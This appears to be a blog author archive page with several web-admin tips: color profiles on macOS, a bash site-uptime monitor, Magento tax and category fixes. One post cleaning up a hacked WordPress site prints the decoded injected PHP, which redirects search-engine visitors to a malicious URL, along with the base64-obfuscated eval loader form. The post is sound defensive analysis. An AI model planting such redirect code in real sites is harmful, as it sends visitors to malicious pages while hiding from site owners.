All posts by Axel

I’ve been having a frustrating issue where, when you copy and then paste an image to upload to a website, the colors end up changed.

This is primarily caused by the color profile settings on your system being off.

Here was the problem I was experiencing:

See the difference? The copy/pasted image’s colors were dull and desaturated, while the uploaded file’s colors were correct.

To fix this issue and ensure your colors stay accurate between your desktop (offline) programs and the web, you must first make sure you are using an sRGB color profile.

Without going into too much detail, sRGB is the default color space for most applications (browsers, desktop apps, etc.). Everything shown on the web is essentially sRGB, because most browsers ignore color profiles saved to images. Here’s more on this subject: http://petapixel.com/2009/09/17/why-you-should-probably-use-srgb/

I fixed this on OSX by doing the following:

1) Open System Preferences > Displays
2) Go to the Color tab, and change your profile to an sRGB color profile (I’m using sRGB IEC61966-2.1)

3) Make sure any image editing software, such as Photoshop, is set to the same color profile:

4) Restart your computer (in OSX, even after I changed the color profile, the issue persisted until I restarted).

After doing everything above, if you copy/paste images to upload to the web, they should show the same colors as the originals on your computer.

Hopefully this saves someone some trouble, as it had me pulling out my hair for a while!

Today I discovered that accessing my website through Google caused the site to redirect to a malicious URL. Accessing the site directly didn’t cause the redirect to initiate (because the developers of this attack specifically target search engine referrals). It’s clever, as the site owner may never become aware of the attack unless they happen to Google their own site, then try accessing it.

The method of this attack is simple. Gain access to a core WordPress file and inject some code that initiates a redirect to a specific URL.

In my case, the injected file was wp-config.php, located in the WordPress root directory.

The attacker encoded the script using base64, which is clever because it prevents you from searching the file system for the known redirect URL. When someone visits your site, the code is decoded and then executed.
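A typical injection of this style shows up as a single long line somewhere in the file, along these lines (an abbreviated illustration, not the exact line from my site; the first characters of this payload happen to decode to "error_reporting"):

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5n...'));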

Using a site such as base64decode.org, you can easily see what the script contents are:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag)
    {
        if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0"))
        {
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com"))
            {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl"))
                {
                    header("Location: http://henfra.vizvaz.com/");
                    exit();
                }
            }
        }
    }
}

You can see how the script checks for specific referrers, albeit in a poorly written way.

Simply removing the injected code from the file and re-saving it will prevent the malicious redirect from occurring. If it’s still happening, you may want to do a site-wide search for eval or base64_decode, since you know the attacker uses these functions to execute their code.
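For example, from an SSH session (assuming grep is available on your server), something like this will list every line that calls those functions. Expect some legitimate matches, since WordPress core and many plugins use base64_decode too:

# Search the whole WordPress tree for the functions the attacker relies on
# (replace /path/to/wordpress with your install's root directory)
grep -rn "base64_decode" /path/to/wordpress
grep -rn "eval(" /path/to/wordpress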

I hope this helps someone facing a similar issue. Remember, always keep your WordPress (or any CMS for that matter) up to date to prevent known security holes from being exploited.

With tax-free season coming around, the majority of my Magento clients requested that products assigned to specific categories be made tax free.

Magento sets the tax_class_id attribute at the product level, which would require a batch update of the products; however, I can’t filter that update by specific categories, which puts me back at square one.

Below is a simple SQL query that will update all products to a Tax Class of None, based on a set of category ids I define.
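A sketch of that kind of query, using Magento 1.x’s default table names (back up your database before running anything like this), might look like the following:

-- Set tax_class_id to 0 ("None") for every product assigned to the listed categories.
-- Replace the category IDs in the IN (...) clause with your own.
UPDATE catalog_product_entity_int AS val
JOIN eav_attribute AS attr
    ON attr.attribute_id = val.attribute_id
JOIN eav_entity_type AS etype
    ON etype.entity_type_id = attr.entity_type_id
JOIN catalog_category_product AS ccp
    ON ccp.product_id = val.entity_id
SET val.value = 0
WHERE attr.attribute_code = 'tax_class_id'
  AND etype.entity_type_code = 'catalog_product'
  AND ccp.category_id IN (4, 5, 6);

After a direct database change like this, you would still need to reindex product prices (Index Management in the admin) before the new tax class takes effect on the frontend.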

Maintaining a handful of websites can be stressful. Even more so when you don’t know that one of those sites has gone down.

There are services such as SiteUptime that will do this for you out of the box; however, there are efficient, free ways of doing it yourself.

Prerequisites:
1. You have permission to create and run bash (shell) scripts on your server.
2. You have permission to create and schedule cronjobs on your server.
3. You have permission to send emails from your server.

Ok, let’s get started.

1. Create a file on your server called monitorsites.sh (the location doesn’t matter; however, I recommend keeping it outside of publicly accessible folders).
2. In monitorsites.sh, paste the following:
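A minimal sketch of such a script, matching the variables and sample output described in the steps below, might look like this (it assumes curl and a working mail command are available on the server):

#!/bin/bash
# Simple uptime check: read URLs from sites.txt, curl each one,
# and email the addresses in EMAILS when a site doesn't respond with HTTP 200.

EMAILS="you@email.com,someoneelse@email.com"   # comma-separated list of recipients
SITESFILE=sites.txt                            # one complete URL per line

while read site; do
    [ -z "$site" ] && continue   # skip blank lines

    # Fetch only the HTTP status code; follow redirects, give up after 10 seconds
    CODE=$(curl --silent --location --max-time 10 --output /dev/null --write-out "%{http_code}" "$site")

    if [ "$CODE" = "200" ]; then
        echo "The HTTP server on $site is up!"
    else
        echo "$site (http) Failed"
        for email in $(echo "$EMAILS" | tr ',' ' '); do
            echo "$site did not respond (HTTP status: $CODE) at $(date)" | mail -s "Site down: $site" "$email"
            echo "Alert sent to $email"
        done
    fi
done < "$SITESFILE"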

3. In the monitorsites.sh file, change the EMAILS variable to a comma-separated list of email addresses you wish to send the notification to. For example: EMAILS="someone@gmail.com,anotherone@gmail.com"

4. Create a file named sites.txt in the same folder as monitorsites.sh. In this file, create a list of complete URLs you wish to monitor.
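For example, to produce the sample output shown in step 6, sites.txt would contain:

http://www.google.com
http://www.axertion.com
http://someotherwebsite.com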

5. Test the script. Log in to your server using SSH, and run the script with the following command: sh monitorsites.sh

6. If done correctly, you will see something like this:

The HTTP server on http://www.google.com is up!
The HTTP server on http://www.axertion.com is up!
http://someotherwebsite.com (http) Failed
Alert sent to you@email.com
Alert sent to someoneelse@email.com

Once set up, your cronjob will run at the interval you choose, and you will receive an email if one of your sites doesn’t respond.
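For example, a crontab entry like the following (the path is a placeholder) would run the check every five minutes:

# Run the check every five minutes; discard console output, since alerts are emailed by the script itself
*/5 * * * * /bin/sh /path/to/monitorsites.sh >/dev/null 2>&1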

Keep in mind that if your sites are hosted on the same server this script runs on, and the cause of the downtime is that server going down, you may not receive the alert email. It should, however, still alert you if your Apache (httpd) process fails, since the script does not rely on that process to run.

1. The Rewrite rule must be placed at the top of your .htaccess file (some rules set by Magento conflict with LiteSpeed’s rule interpreter).
2. The Rewrite rule must be formatted correctly (remove the escaping backslashes from the RewriteRule).
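As a purely hypothetical illustration of that second point (this is a made-up rule, not the one from my .htaccess), a redirect written with escaped characters such as

RewriteRule ^old\-category\/old\-page\.html$ http://www.example.com/new-page/ [R=301,L]

would instead be written without the backslashes:

RewriteRule ^old-category/old-page.html$ http://www.example.com/new-page/ [R=301,L]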

If you’re running a large Magento store, you may encounter the dreaded “Please Wait” popup that hangs for a long period of time when attempting to move a category.

I looked into it and discovered that Magento was triggering a reindexing process, which usually takes quite a bit of time to complete. You obviously don’t want to wait an eternity to move a single category, so you can do the following as a temporary way of disabling the reindexing when you move a category.

Disclaimer: This has been tested only on Magento 1.6.2

1. Open app/code/core/Mage/Catalog/Model/Category.php
2. Look for the following, around line 248: